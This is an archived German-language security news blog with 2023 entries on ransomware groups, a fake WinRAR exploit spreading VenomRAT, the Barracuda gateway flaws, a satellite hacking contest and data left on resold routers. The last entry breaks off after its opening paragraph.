Was IT-Security-Experten den Schlaf raubt (2018 bis 2023)

Was IT-Security-Experten den Schlaf raubt (Archiv)

Uhr
von Coen Kaat

Komisch, spannend und beängstigend. Jeden Tag erscheinen neue Meldungen zu DDoS-Attacken, Ransomware, Cryptominern und Co. Die Redaktion bloggt an dieser Stelle über alles rund um Cybercrime und IT-Security.

(Source: Coen Kaat)
(Source: Coen Kaat)

Ticker

23.01.2024 - 18:12 Uhr

Dieser Blog endet, ein neuer beginnt

Nach 5 Jahren hat sich auf dieser Seite einiges angestaut: über 250 Beiträge. Dazu gehören diverse multimediale Elemente, die das Laden dieser Website etwas ausbremsen - unter anderem, weil der Blogschreiberling eine Vorliebe für GIFs hat. Um das Laden des Blogs zu beschleunigen, wurden die Beiträge von 2018 bis 2023 an dieser Stelle archiviert. Die neuen Blogeinträge ab 2024 finden Sie hier im neuen Security-Blog von SwissCybersecurity.net.

21.11.2023 - 16:53 Uhr

Erpresser verpfeifen Opfer wegen Datenlecks bei den Behörden

Der börsennotierte Softwareentwickler Meridianlink ist verpfiffen worden. Das Unternehmen habe einen Cybervorfall, bei dem auch Kundendaten und betriebliche Informationen abgeflossen seien, nicht dem United States Securities and Exchange Commission (SEC) gemeldet. Und wer hat die US-amerikanische Börsenaufsichtsbehörde informiert? Diejenigen, die es wohl am besten wissen: Die Hacker, die angeblich die Daten gestohlen haben. 

Die Hackergruppe Blackcat (alias ALPHV) hatte das Unternehmen zuvor auf ihrer Website als Opfer gelistet, wie "Bleepingcomputer" berichtet. Dies sei mit der Androhung geschehen, die angeblich gestohlenen Daten zu veröffentlichen, sollte das Unternehmen nicht innerhalb von 24 Stunden ein Lösegeld zahlen. Die Daten entwendeten die Cyberkriminellen nach eigenen Angaben am 7. November; Unternehmen haben in den USA nach Bekanntwerden eines Cyberangriffs vier Tage Zeit, diesen zu melden. Diese Regel tritt allerdings erst am 15. Dezember in Kraft, wie "Reuters" berichtet.

Blackcat will jedoch keine Antwort auf die Forderungen erhalten haben. Dies führte wohl zu der Beschwerde beim SEC. Damit versuchen die Cyberkriminellen vermutlich, mehr Druck auf ihr Opfer auszuüben. Auf ihrer Website veröffentlichten sie einen Screenshot der Meldung an die Behörde sowie deren Empfangsbestätigung. 

Gegenüber "Bleepingcomputer" bestätigte Meridianlink die Cyberattacke. Das Unternehmen arbeite noch immer daran, festzustellen, ob persönliche Daten von Kunden betroffen sind oder nicht. 

07.11.2023 - 10:13 Uhr

Diese Cyberrisiken sieht der Bundesrat im Weltraum

Der Bundesrat hat Ende Oktober 2023 seinen Bericht "Cyberrisiken im All" gutgeheissen. Damit reagierte der Bundesrat auf ein Postulat, das die Noch-National­rätin und Swico-Geschäftsführerin Judith Bellaiche im Dezember 2021 eingereicht hatte.

Mit "Cyberrisiken im All" sind natürlich keine Hacker­angriffe von E.T., den Cardassianern und Co. gemeint. Der Bund befasste sich in dem Bericht mit ­Cyberrisiken, die sich durch die Abhängigkeiten von anderen Ländern im Bereich Weltrauminfrastruktur für die Schweiz ergeben, wie es darin heisst. Die kritischen Abhängigkeiten von Dienstleistungen, die auf diese Infrastruktur zurückgreifen – etwa im Bereich der Kommunikation –, dürften weiter zunehmen.

Die Schweiz habe einen vergleichsweise kleinen und wenig versorgungs- und sicherheitskritischen Bestand an Weltrauminfrastruktur. Daraus würden sich auch nur begrenzt Möglichkeiten ergeben, im Betrieb der Weltrauminfrastruktur die Cybersicherheit zu stärken. Als Forschungs- und Entwicklungsstandort für diese Technologien kann die Schweiz aber verschiedene Massnahmen ergreifen. Dazu zählt etwa, die Erhöhung der Cybersicherheit von Soft- und Hardware durch einen Security-by-Design-Ansatz zu fördern.

Eine weitere mögliche Massnahme wären schweizweite Anreize oder Auflagen für private Hersteller und Betreiber der Weltrauminfrastruktur. Beide Massnahmen würden in den Rahmen der Nationalen Strategie zum Schutz der Schweiz vor Cyber-Risiken (NCS) fallen.

Ferner sieht der Bundesrat auch auf dem internationalen Parkett potenzielle Massnahmen. Dazu zähle etwa eine intensivierte Zusammenarbeit in der Raumfahrtforschung und eine stärkere Beteiligung an internationalen Technologieentwicklungs- und Forschungsprogrammen. Dies könne langfristig den Zugang zu Weltrauminfrastrukturen sicherzustellen. Wenn sich die Schweiz in solchen Programmen ihre Schlüsselkompetenzen festigt und weiterentwickelt, kann sie sich frühzeitig positionieren und sich als "Weltrauminfrastrukturen sicherzustellen", wie es in dem Bericht heisst.

Der Bundesrat formulierte acht mögliche Massnahmen. Wenn es um die konkrete Umsetzung geht, gibt er den Ball jedoch ab. Die zuständigen Departemente sollen die Massnahmen prüfen. Die Umsetzung erfolge im Rahmen der bewilligten Kredite durch die Departemente in ihren Zuständigkeitsbereichen.

Mehr zum Thema Abhängigkeiten und der Cybersouveränität lesen Sie hier im Interview mit Florian Schütz, dem Delegierten des Bundes für Cybersicherheit. Darin sagt Schütz, wie die Schweiz eine möglichst grosse Handlungsfreiheit erreicht und welchen Beitrag die Privatwirtschaft und die Start-up-Szene dazu leisten können.

 

01.11.2023 - 14:50 Uhr

Deshalb stehen Cyberkriminelle auch auf Ryan Gosling und Co.

McAfee hat seine aktuelle Hot List veröffentlicht. ­Dabei handelt es sich nicht um eine Aufzählung der Lieblingspromis des US-amerikanischen Security-Anbieters. Stattdessen listet das Unternehmen seit unterdessen 15 Jahren die Prominenten auf, deren Namen am häufigsten von Betrügern im Netz genutzt werden. Die Betrüger orientieren sich dabei wohl an denjenigen Namen, die derzeit am häufigsten gesucht werden.

Die aktuelle Liste führt der kanadische Schauspieler Ryan Gosling an - bekannt aus Spielfilmen wie "Blade Runner 2049", "Wie ein einziger Tag" und aktuell "Barbie". Auf Gosling folgen:

  • Emily Blunt,
  • Jennifer ­Lopez,
  • Zendaya,
  • Kevin Costner,
  • Elon Musk,
  • Al Roker,
  • Margot Robbie,
  • Bad Bunny
  • und America Ferrera.

Suchanfragen nach diesen Prominenten würden am häufigsten zu riskanten Websites und Malware führen, schreibt McAfee. Bei der aktuellen Untersuchung zeige sich auch ein Trend zu KI-gesteuerten Betrugsversuchen. So werde KI etwa genutzt, um Deepfake-Inhalte zu erstellen. Bei einer Stichprobe der Top-50-Promis habe McAfee zwischen 25 und 135 Deepfake-URLs pro Promi-Suche entdeckt. Die Cyberbetrüger nutzen die Promi-Deepfakes, um Des­informationen zu verbreiten, um Opfer dazu zu bringen, Malware herunterzuladen sowie für betrügerische Werbung und Kryptowährungsbetrug. McAfee mahnt daher zur Vorsicht beim Klicken.

"In der heutigen Kultur, in der Promi-News und -Unterhaltung Teil des täglichen Lebens vieler Menschen sind, werden Geschwindigkeit und Bequemlichkeit oft über den eigenen Onlineschutz gestellt", sagt Steve Grobman, Chief Technology Officer von McAfee. "Dazu zählen das Klicken auf Pop-ups, verdächtige Promi-Links und die Suche nach kostenlosen Inhalten wie Film-Downloads. Die Suchenden setzen sich dabei einem Risiko aus."

20.10.2023 - 11:30 Uhr

Cyberkriminelle ködern auch andere Cyber­kriminelle mit falschen Zugangsdaten

Sobald etwas populär wird, nutzen Scammer die Beliebtheit aus, um ihre Opfer hinters Licht zu führen. Mit Angeboten, die wirklich zu gut sind, um wahr zu sein, locken sie Sparfüchse, Schnäppchenjäger und Co. in die Falle. Das gilt auch für den aktuellen Hype um KI-Tools wie ChatGPT. Aber eben auch genauso für den cyberkriminellen Untergrund, wie die Experten des russischen Cybersecurity-Anbieters Kaspersky herausgefunden haben.

Das Team analysierte einige verdächtige Angebote für ein bösartiges KI-Tool namens WormGPT. Das Tool funktioniert ähnlich wie sein Namensvetter ChatGPT, nach dem es benannt wurde. Im Gegensatz zu ChatGPT verfügt WormGPT allerdings über keine Beschränkungen, die schädliche Verwendungszwecke verhindern sollen. Dies macht WormGPT zu einem effektiven Werkzeug für Cyberkriminelle. Diese setzen vermehrt KI ein, um Malware zu entwickeln oder um Texte für Phishing- oder Business-E-Mail-Compromise-Attacken zu dichten.

Kaspersky fand ausser dem Angebot des Entwicklers weitere Websites im Darknet, die Zugänge zu WormGPT verkauften. Dabei handelt es sich gemäss der Einschätzung des Security-Anbieters jedoch um Phishing-Versuche. Die Designs unterscheiden sich von der Originalwebsite, und auch bei der Preisgestaltung und den Zahlungsmöglichkeiten zeigen sich verdächtige Unterschiede. Einige dieser Seiten bieten auch eine Testversion von Worm GPT an - auf diese habe man aber erst nach erfolgter Bezahlung Zugriff.

"Im Dark Web ist es unmöglich, bösartige Ressourcen mit absoluter Sicherheit zu erkennen", sagt Alisa Kulishenko, Digital Footprint Analyst bei Kaspersky. "Es gibt jedoch viele indirekte Hinweise, die darauf hindeuten, dass es sich bei den entdeckten Websites tatsächlich um Phishing-Seiten handelt."

Wenn Cyberkriminelle andere Cyberkriminelle übers Ohr hauen, stellt dies zwar "keine unmittelbare Bedrohung" für Nutzerinnen und Nutzer dar, wie Kaspersky schreibt. Aber dieser Trend zeige die steigende Beliebtheit von bösartigen Alternativen zu GPT-Modellen und verdeutliche die Notwendigkeit robuster Cybersicherheitslösungen.

 

05.10.2023 - 10:10 Uhr

Rattenplage auf Github: Falscher WinRAR-­Exploit verbreitet den Schädling VenomRAT

Wenn Schwachstellen auftauchen, interessieren sich beide Seiten brennend dafür, wie sich diese ausnutzen lassen: die Guten, um sich zu schützen, und die Bösen, um es nachzumachen. Wenn User auf Github in Machbarkeitsnachweisen zeigen, wie dies geht, ist das Interesse daran entsprechend gross. Allerdings bekommt man nicht immer das, was man herunterzuladen meint, wie ein aktuelles Beispiel zeigt.

Ein User mit dem Pseudonym "Whalersplonk" bot ein Proof-of-Concept (PoC) an, das zeigen soll, wie man eine jüngst behobene Schwachstelle (CVE-2023-40477) im Archivierungsprogramm WinRAR ausnutzen kann. Dem ist aber nicht so, wie Palo Altos Unit42 mitteilt.

Erstens handelt es sich bei dem angebotenen Python-Skript nicht um einen Exploit für die WinRAR-Schwachstelle, sondern um einen öffentlich zugänglichen Code, mit dem man eine Geoserver-Sicherheitslücke (CVE-2023-25157) ausnutzen kann. Und zweitens lädt man sich einen Schädling auf den Rechner, wenn man den WinRAR-PoC ausführt. Wenn man ihn ausführt, erstellt der vermeintliche Exploit ein Batch-Skript, das wiederum ein verschlüsseltes Powershell-Skript herunterlädt und auf dem Host ausführt.

 

 

Das Skript lädt eine Malware namens VenomRAT herunter und sorgt mit dem Task Scheduler dafür, dass der Schädling alle drei Minuten ausgeführt wird. Der Remote-Access-Trojaner (RAT) kann Tastenanschläge aufzeichnen und lokal in einer Textdatei speichern. VenomRAT kann zudem andere Schadprogramme auf den Rechner schleusen und Zugangsdaten stehlen. 

So wie Unit42 den Ablauf der Ereignisse schildert, ist es naheliegend, dass die Cyberkriminellen die Ressourcen für den Angriff und den Schädling schon bereit hatten, bevor die WinRAR-Schwachstelle bekannt wurde, wie "Bleepingcomputer" berichtet. Sie warteten wohl auf den richtigen Moment, um ihren irreführenden falschen PoC zu veröffentlichen.

28.08.2023 - 11:58 Uhr

FBI mahnt, Barracuda-Appliances zu isolieren - auch die gepatchten

Seit Oktober 2022 nutzen Cyberkriminelle eine Schwachstelle im E-Mail Security Gateway (ESG) des US-amerikanischen Herstellers Barracuda Networks aus. Die Schwachstelle trägt die Kennnummer CVE-2023-2868 und wird als kritisch eingestuft. Angreifende könnten diese ausnutzen, um eine Backdoor einzurichten und Daten zu stehlen.

Im Mai - einen Tag nachdem die Schwachstelle bekannt wurde - veröffentlichte der Hersteller einen Patch. Dieser hätte das Problem beheben sollen - hat er aber nicht, wie das Federal Bureau of Investigation (FBI) in einer aktuellen Mitteilung (PDF) schreibt.

"Die von Barracuda als Reaktion auf dieses CVE veröffentlichten Patches waren unwirksam", heisst es in der Meldung. Wie die Behörde feststellt, lassen sich auch gepatchte Appliances weiterhin von Cyberkriminellen ausnutzen.

Das FBI mahnt Unternehmen, die ein ESG von Barracuda nutzen, alle betroffenen Appliances sofort zu isolieren und auszutauschen. Ferner sollten Admins alle Netzwerke auf Verbindungen mit der bereitgestellten Liste von Kompromittierungsindikatoren scannen. Die Behörde wiederholt damit eine Warnung, die auch Barracuda schon bei der Veröffentlichung des Patches aussprach.

Für die Attacken auf die Barracuda-Lösungen nutzten die Cyberkriminellen eine Reihe von Schädlingen mit passenden nautischen Bezeichnungen. Seaspy, Saltwater, Seaside, Submariner und Whirlpool. Mandiant vermutet, dass die pro-chinesische Hackergruppe UNC4841 für die Angriffe verantwortlich ist, wie "Bleepingcomputer" berichtet. Das FBI schreibt in seiner Meldung ebenfalls, dass die Schwachstelle "mutmasslich durch chinesische Cyberakteure" ausgenutzt werde.

22.08.2023 - 15:26 Uhr

Ransomware BlackCat entwickelt sich weiter zu Sphynx

Die Ransomware BlackCat (auch bekannt als ALPHV) hat neue Tricks gelernt. Mit dem Upgrade auf die Version 2.0 bekam der Schädling von seinen Entwicklern auch einen neuen Namen: Sphynx.

Das erneuerte Schadprogramm erhielt einen neugeschriebenen Quellcode. Die Entwickler konzentrierten sich beim Upgrade auf die Fähigkeiten des Schädlings, den wachsamen Augen von Antiviren- und EDR-Lösungen auszuweichen, wie Microsoft in ­einer Analyse auf X (also Ex-Twitter) schreibt. Zu diesem Zweck nutzt Sphynx neu etwa das Impacket-Networking-Framework und das Remcom-Hacking-Tool. Beide helfen der Ransomware, sich in einem kompromittiertem Netzwerk auszubreiten.

IBMs Sicherheitssparte Security X-Force vertiefte sich ebenfalls in Sphynx. Sie warnt, dass sich BlackCat mit dem Schritt zu Sphynx von einem Verschlüsselungsprogramm zu einem Toolkit entwickelte. Denn Sphynx kann die Features von ­Impacket nicht nur nutzen, um sich lateral im Netzwerk zu bewegen, sondern auch um etwa Code aus der Ferne auszuführen oder Daten zu stehlen.

Die cyberkriminelle Gruppierung hinter Sphynx nahm den Betrieb im November 2021 auf. Wie "Bleepingcomputer" berichtet, handelt es sich vermutlich um dieselbe Bande, die schon zuvor mit DarkSide beziehungsweise BlackMatter aktiv war – dieselben Kriminellen, die verantwortlich waren für die Cyber­attacke of Colonial Pipeline im Mai 2021.

22.08.2023 - 15:05 Uhr

MoustachedBouncer: Hackergruppe attackiert ausländische Botschaften in Belarus

Sie ist seit mindestens 2014 aktiv, blieb jedoch bis August 2023 unentdeckt: die Hackergruppe MoustachedBouncer. In einer aktuellen Analyse beschreibt der slowakische IT-Security-Anbieter Eset, wie die Cyberspionage-Bande vorgeht. Demnach arbeitet MoustachedBouncer möglicherweise mit einer anderen Gruppierung namens Winter Vivern zusammen.

Die Hacker versuchen, ISPs mit sogenannten Adversary-in-the-Middle-Attacken zu kompromittieren. Bei diesen Angriffen schleichen sich die Cyberkriminellen – wie bei Man-in-the-Middle-Attacken – in die Kommunikation zwischen zwei Parteien ein. Das können zwei User, zwei Geräte oder auch ein User und eine Anwendung sein. Im Gegensatz zu Man-in-the-Middle-Attacken gehen Adver­sary-in-the-Middle-Attacken nun aber noch einen Schritt weiter: Die Hacker übernehmen die Kontrolle über die Netzwerkinfrastruktur, um diese manipulieren zu können. 

"Um ihre Ziele zu kompromittieren, manipulieren die Akteure von MoustachedBouncer den Internetzugang ihrer Opfer", sagt Eset-Forscher Matthieu Faou. Danach würden die Cyberkriminellen dem Betriebssystem vorgaukeln, dass es sich hinter einem firmeneigenen Portal befände. "Bei den IP-Bereichen, auf die MoustachedBouncer abzielt, wird der Netzwerkverkehr auf eine scheinbar legitime, aber gefälschte Windows-Update-Seite umgeleitet."

MoustachedBouncer hat ein spezifisches Beuteschema: Die Gruppierung späht ausländische Botschaften in Belarus aus. Der Fokus der Bande liegt laut Eset auf dem Diebstahl von Daten und der Überwachung interner und externer Laufwerke von Botschaftsmitarbeitenden. Diplomaten seien ein hochgradig gefährdeter Personenkreis und ein attraktives Ziel für politisch motivierte Hacker, sagt Faou.

Und wer ist der Drahtzieher hinter den Drahtziehern? Eset stellt in seiner Analyse eine Vermutung auf. "Da die Gruppe im Interesse von Belarus agiert, erhalten belarussische Behörden mutmasslich Zugang zu den gekaperten Daten", schreibt der Sicherheitsanbieter.

 

08.08.2023 - 12:37 Uhr

Wie Emotet, Darkgate und Lokibot neue Wege zu ihren Opfern finden

Der russische Sicherheitsanbieter Kaspersky hat in einer aktuellen Analyse neue Infektionswege von zwei altbekannten und einer relativ jungen Malware untersucht. Die Experten warfen einen Blick auf aktuelle Kampagnen von Emotet und Lokibot sowie auf den neuen Schädling Darkgate. 

Emotet weicht auf Onenote aus

Emotet ist bereits ein alter Hase in der Bedrohungslandschaft - das Schadprogramm tauchte erstmals in 2014 auf. Seitdem entwickelte sich der Schädling stets weiter. Bei aktuellen Kampagnen versucht Emotet über die Onenote-Dateien in Unternehmensnetzwerke einzudringen. 

Öffnet man die vermeintliche Notiz-Datei, führt diese versteckte VBS-Scripts aus, wie Kaspersky schreibt. Das Skript versuche anschliessend so lange schädliche Payloads von verschiedenen Websites herunterzuladen, bis das System erfolgreich infiziert wurde. Um die volle Kontrolle zu übernehmen, pflanze Emotet zusätzlich eine DLL-Datei im temporären Verzeichnis ein.

Für Emotet ist diese Angriffsmethode neu; andere Schädlinge setzen jedoch schon länger auf Onenote. So betrachtete etwa McAfee bereits im März dieses Problem in einer grösseren Analyse. Der Sicherheitsanbieter führt dies darauf zurück, dass Microsoft Anfang 2022 ankündigte, die Aktivierung von Makros in Dokumenten aus dem Internet zu erschweren (lesen Sie hier mehr dazu). Seitdem setzen Schadprogramme auf LNK-Verknüpfungen oder eben Onenote-Dateien. McAfee listete im März die folgenden Schadprogramme auf, die bereits versuchen, über Onenote Rechner zu infizieren:

  • Iceid 
  • Qakbot
  • RedLine
  • AsyncRat
  • Remcos
  • AgentTesla
  • QuasarRAT
  • XWORM
  • Netwire
  • Formbook
  • Doubleback 

Lokibot macht Jagd auf Frachtschiffunternehmen

Andere Schadprogramme setzen trotzdem weiter auf Makros. So beobachtet Kaspersky etwa, wie Lokibot derzeit versucht, mit Excel-Dateien Frachtschiffunternehmen zu kapern. Öffnet man die Excel-Datei im Anhang der Phishing-Mails, wird man aufgefordert, Makros zu aktivieren. Das Ziel: Anmeldeinformationen von verschiedenen Anwendungen, einschliesslich Browsern und FTP-Clients, zu stehlen.

Hierfür verwendet Lokibot gleich zwei bekannte Sicherheitslücken: CVE-2017-0199 und CVE-2017-11882. Für beide stehen bereits seit 2017 Patches von Microsoft bereit!

Darkgate setzt auf personalisierte Schlüssel

Der dritte Schädling in der Analyse von Kaspersky heisst Darkgate. Dabei handelt es sich um einen im Juni 2023 entdeckten Loader mit einer Vielzahl von Funktionen. Dazu zählen laut Mitteilung unter anderem:  

  • ein verstecktes Virtual Network Computing (VNC), 
  • die Deaktivierung von Windows Defender, 
  • das Stehlen des Browserverlaufs, 
  • Reverse Proxy,
  • unerlaubte Dateiverwaltung 
  • und das Abgreifen von Discord-Tokens.

Der Loader unterscheide sich von anderen seiner Art durch seine Verschlüsselungsmethode. So nutze Darkgate Zeichenketten mit personalisierten Schlüsseln und einer angepassten Version der Base64-Kodierung mit einem speziellen Zeichensatz. 

Um nicht zum Opfer dieser Schädlinge zu werden, empfiehlt Kaspersky, Schutzsoftware stets auf dem aktuellen Stand zu halten, die Verteidigungsstrategie auf die Erkennung von lateralen Bewegungen und Datenlecks im Internet konzentrieren (und dabei besonders auf den ausgehenden Datenverkehr zu achten) und nicht manipulierbare Offline-Backups einzurichten, auf die man im Notfall schnell zugreifen kann.

05.06.2023 - 12:28 Uhr

Ethische Hacker im All: US-Regierung lässt Hacker auf Satelliten los

Seit 4 Jahren können ethische Hacker beim Hack-A-Sat-Wettbewerb versuchen, einen Satelliten zu kapern. Der Wettbewerb wird mitorganisiert durch die US Air Force und die Space Force im Rahmen der jährlichen Security-Konferenz Def Con. Dabei handelt es sich allerdings um Laborversuche – die Teilnehmenden können im Rahmen des Wettbewerbs nicht wirklich einen Satelliten hacken. 

Das soll sich nun ändern. Die US-amerikanische Regierung finanzierte ein Projekt, um eine Hacking-Sandbox im Weltall zu realisieren. Dafür soll ein Cubesat mit einem Gewicht von etwa 5 Kilogramm in einen Orbit um die Erde gebracht werden. Mit den Solarpanelen ist der Satellit nur 50 Zentimeter breit, 34 lang und 11 hoch, wie "The Register" berichtet.

Der zu hackende Satellit Moonlighter. (Source: The Aerospace Corporation)

Der zu hackende Satellit Moonlighter. (Source: The Aerospace Corporation)

Damit mehrere Teams gefahrlos um die Kontrolle über den Satelliten wetteifern können, betreibt dieser eine Software-Payload, die sich wie ein echter Flugcomputer verhält. So soll der Satellit namens Moonlighter realistische Attacken überstehen können, ohne dass die kritischen Subsysteme dabei gefährdet werden. 

Im August soll es soweit sein. Die ersten Hackversuche sollen im Rahmen des diesjährigen und vierten Hack-a-Sat-Wettbewerbs erfolgen. Fünf Teams haben sich bereits dafür qualifiziert. Den Top-3-Teams winken Preisgelder von 50'000, 30'000 beziehungsweise 20'000 US-Dollar. 

"Space is hard"

Damit irdische Hacker den Satelliten im Orbit hacken können, muss dieser es allerdings zuerst dorthin schaffen. Ursprünglich hätte Moonlighter am 3. Juni mit einer Falcon-9-Rakete von SpaceX ins Weltall fliegen sollen. Aufgrund des widrigen Wetters wurde der Start jedoch um einen Tag verschoben. 

Zwar hob am Sonntag, dem 4. Juni, tatsächlich eine Falcon 9 vom Kennedy Space Center in Florida ab. Der zu hackende Satellit war aber nicht an Bord. Auf Twitter verkündeten die Hack-a-Sat-Organisatoren nämlich, dass der Start um einen weiteren Tag auf den 5. Juni verschoben wurde – begleitet durch den Kommentar "Space is hard". 

Wer den Start heute um 17:45 live mitverfolgen will, kann ihn sich hier im Livestream der NASA anschauen:

Diese Einschätzung, "Space is hard", trifft auch auf die Cybersecurity-Bemühungen im Weltall zu. Gewisse Faktoren machen die Security von Systemen im Weltall einzigartig. "Das Offensichtlichste ist, dass man nicht einfach hingehen und das System neu starten kann", zitiert "The Register" James Pavur, Lead Cybersecurity Software Engineer bei Istari und Teilnehmer an allen drei bisherigen Hack-A-Sat-Wettbewerben. 

Weil die Risikotoleranz bezüglich eines Kommunikationsverlustes so gering ist, verfügen Satelliten über mehrere redundante Systeme. Das bedeutet jedoch zugleich, dass es auch mehrere Wege gibt, auf denen Hacker sich Zugriff verschaffen könnten. 

Satelliten sind zudem sehr aggressiven Umweltbelastungen ausgesetzt: solare Strahlung, extreme Temperaturen und herumfliegender Weltraummüll. Diese bestimmt vorhandenen physischen Bedrohungen werden daher oft höher gewichtet als mögliche Cyberattacken – sehr zum Nachteil der Cybersecurity.

Update: Auf Twitter haben die Organisatoren einen erfolgreichen Start der Rakete verkündet. Der Satellit umkreist nun die Erde und wartet darauf, gehackt zu werden

19.05.2023 - 10:03 Uhr

Cactus-Ransomware verschlüsselt sich selbst, um andere zu infizieren

Die Spezialisten von Kroll warnen vor einer neuen Ransomware. Das Schadprogramm namens ­Cactus verhält sich auf den ersten Blick wie jede andere Ransomware: Daten werden verschlüsselt und gestohlen, die Opfer werden erpresst und wenn sie nicht zahlen, drohen die Cyberkriminellen damit, Firmengeheimnisse auszuplaudern. Was diesen Schädling von den anderen unterscheidet, ist, dass er sich selbst verschlüsselt.

Es handelt sich dabei aber keineswegs um einen Schuss, der nach hinten losging. Nein, die Selbstverschlüsselung ist Absicht. So versucht Cactus, Antivirenprogramme und Netzwerk-Monitoring-Tools auszutricksen, da diese den Inhalt nicht scannen können. Die Binärdatei für die Verschlüsselung der Dateien der Opfer kommt verschlüsselt auf den infizierten Rechner.

Der Schlüssel wird in einer Datei mit einem Zufallstext mit der Bezeichnung ntuser.dat bereitgestellt. Geladen wird der Schlüssel über die Aufgabenplanung. Einmal entschlüsselt, kann der Schädling nach ­Dateien suchen und diese verschlüsseln.

Gemäss Kroll infiziert der Schädling Rechner, indem er eine bekannte Schwachstelle in VPN-Appliances von Fortinet ausnutzt. Die Firmware aktuell zu halten und das Netzwerk nach grösseren Datenabflüssen zu monitoren, sollte grösseren Schaden verhindern.

26.04.2023 - 15:13 Uhr

So verkaufen Firmen unwissentlich den Zugang zu ihren Netzwerken

Hardware-Erneuerungen sind keine Seltenheit in Unternehmen. Produkte erreichen ihr End-of-Life und werden ersetzt durch - idealerweise - neue, bessere, schnellere Modelle. Die alten Geräte werden zuweilen verkauft. Was manche Unternehmen dabei vergessen: die ordnungsgemässe Entsorgung der Hardware.

Die Sicherheitsforschenden von Eset untersuchten, welche Daten man auf gebrauchten Core-Routern noch finden kann. Core-Router sind in grossen Firmennetzwerken mit allen anderen Netzwerkgeräten verbunden. Sie unterstützen mehrere Datenkommunikationsschnittstellen und sind darauf ausgelegt, IP-Pakete mit höchster Geschwindigkeit weiterzuleiten.

Für den Test erwarb Eset 18 Router. Einer war beim Erhalt bereits defekt. Zwei waren identische Kopien voneinander und wurden deshalb im Test als eine Einheit gezählt. Von den verbleibenden 16 Occasion-Routern waren nur 5 korrekt entsorgt worden. Das heisst, auf den übrigen Geräten konnten die Sicherheitsforschenden noch zahlreiche teilweise sensible Daten auslesen. Zwei Geräte waren zwar gehärtet; laut Eset erschwerte dies jedoch nur den Zugang zu den Daten und verunmöglichte ihn nicht.

 

 

 

Bei den meisten Routern fanden die Sicherheitsforschenden vollständige Konfigurationsdaten und somit zahlreiche Details über den Vorbesitzer und dessen Netzwerkeinrichtung. Gewisse Geräte enthielten zudem:

  • Kundeninformationen
  • Anmeldeinformationen (auch für Verbindungen von Drittanbietern zum Netzwerk oder als "trusted party")
  • Router-zu-Router-Authentifizierungsschlüssel und Hashes.
  • Eine Übersicht über alle sensiblen Anwendungen (lokal und in der Cloud) wie etwa Microsoft Exchange, Salesforce, VMware Horizon und SQL

Mit diesen Informationen könnten Cyberkriminelle leicht einen Plan für eine Attacke erstellen und Wege finden, um unbemerkt ins Netzwerk einzudringen.
"Mit dieser Detailtiefe wäre es für einen Angreifer viel einfacher, sich als Netzwerk- oder interne Hosts auszugeben, zumal die Geräte oft VPN-Zugangsdaten oder andere leicht zu knackende Authentifizierungs-Tokens enthalten", schreibt Eset in seinem Forschungsbericht.

Outsourcing an einen IT-Provider hilft nicht immer

Eset warnt Unternehmen daher, sämtliche Daten komplett von jeglicher Hardware zu löschen, bevor man diese verkauft. Bei Unternehmens-Netzwerkgeräten müsse ein Admin einige Befehle ausführen, um die Produkte korrekt zurückzusetzen. Andernfalls könnten die Router in einen Wiederherstellungsmodus gebootet werden, in dem überprüft werden kann, wie das Gerät eingerichtet wurde.

Die eigene IT einem Dienstleister anzuvertrauen, schützt nicht immer. Laut Eset waren "einige der Geräte" Teil eines Managed-Service-Angebots. Das heisst, ein IT-Dienstleister verwaltete die Hardware für einen Kunden. Einer der Router wurde sogar von einem Managed-Security-Services-Provider betrieben.

Router sind nicht die einzigen Geräte mit diesem Problem. Auf fast allen Speichermedien, die gebraucht verkauft werden, sind noch Daten der Vorbesitzer gespeichert. In einer Untersuchung fand Kaspersky private Videos, Zugangsdaten, Fotos einer Cannabis-Aufzucht und auch Unternehmensdaten. Lesen Sie hier mehr dazu.

06.04.2023 - 13:15 Uhr

Rorschach: Check Point warnt vor neuem Ransomware- Schreckgespenst

Die Sicherheitsforschenden von Check Point haben ein neues Schreckgespenst im Cyberraum entdeckt: eine neuartige Ransomware mit besonderen Fähigkeiten. Die Sicherheitsforschenden nannten den Schädling Rorschach - nach dem gleichnamigen Test aus der Psychologie. Denn "jede Person, die die Ransomware untersuchte, sah etwas anderes", wie das israelische Cybersecurity-Unternehmen schreibt. Es handle sich um eine extrem flexible Ransomware, die ihr Verhalten den Bedürfnissen der Betreibenden anpassen kann.

Das neue Erpresserschadprogramm scheint die "besten" Funktionen von einigen der berüchtigsten Ransomware-Programme, die online geleakt wurden, übernommen zu haben. Diese wurden anschliessend noch mit verschiedenen zusätzlichen Features veredelt - vor allem im Bereich der Verhinderung von Analysen und zur Umgehung der Cyberabwehr.

So weist das Erpresserschreiben etwa Ähnlichkeiten zu demjenigen der Ransomware Yanluowang auf. Check Point schreibt im Bericht jedoch, dass andere Rorschach-Varianten Schreiben für die Opfer zurückliessen, die eher an das Erpresserschreiben der Ransomware Darkside erinnern würden.

Eine Collage aus dem Ransomware-Gruselkabinett

Beim Verschlüsselungsverfahren sollen sich die Cyberkriminellen beim geleakten Source-Code der Babub-Ransomware bedient haben. Anderswo im Quelltext entdeckten die Sicherheitsforschenden Ähnlichkeiten zu Lockbit. Gemessen an der Geschwindigkeit, mit der Rorschach infizierte Rechner verschlüsselt, sei der neue Schädling eines der schnellsten bislang bekannten Ransomware-Schadprogramme.

Zu den neuartigen Features von Rorschach gehört etwa, dass der Schädling teilweise autonom vorgehen kann - etwa bei der Erstellung einer Domänen-Gruppenrichtlinie (GPO). Das Schadprogramm verbreitet sich automatisch, wenn es auf einem Domain Controller (DC) ausgeführt wird. Dabei löscht es zeitgleich die Event-Logs auf den infizierten Geräten.

Verbreitet wird Rorschach mittels DLL-Side-Loading von Palo Alto Networks Cortex XDR. Eine Methode, die nicht üblich ist für Ransomware. Der Hersteller wurde gemäss Check Point bereits informiert.

Wer hinter der Rorschach-Ransomware steckt, konnten die Sicherheitsforschenden wohl noch nicht herausfinden. In ihrem Bericht fassen sie zusammen, dass die Betreiber und Entwickler unbekannt bleiben. Sie würden kein Branding verwenden, was bei Ransomware-Operationen relativ selten sei. Sie hätten aber die Messlatte für künftige Ransomware-Attacken klar höher gelegt.

27.03.2023 - 16:48 Uhr

Wie Smartphones Sprachassistenten unhörbar hacken

Forschende der University of Texas in San Antonio und der University of Colorado haben gezeigt, wie sich Geräte mit Audiosignalen hacken lassen. Die Methode nennt sich "Near-Ultrasound Inaudible Trojan" beziehungsweise NUIT und richtet sich gegen Geräte mit Sprachassistenten - wie etwa Smartphones oder Smartspeaker, wie die University of Texas in San Antonio mitteilt. 

